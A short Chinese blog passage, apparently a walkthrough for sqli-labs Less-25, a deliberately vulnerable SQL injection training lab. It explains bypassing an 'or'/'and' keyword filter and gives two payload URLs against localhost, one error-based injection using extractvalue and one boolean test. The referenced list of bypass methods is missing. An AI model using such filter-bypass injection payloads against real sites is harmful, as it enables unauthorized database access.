标签:
本关主要为or and过滤,如何绕过or和and过滤。一般性提供以下几种思路:
暂时只想到这些,还有的话可以补充。
本关利用方法(4)进行。
报错注入 or示例
http://127.0.0.1/sqllib/Less-25/index.php?id=1‘|| extractvalue(1,concat(0x7e,database()))--+
And 示例
http://127.0.0.1/sqllib/Less-25/index.php?id=1&&1=1--+
标签:
原文地址:http://www.cnblogs.com/lcamry/p/5763002.html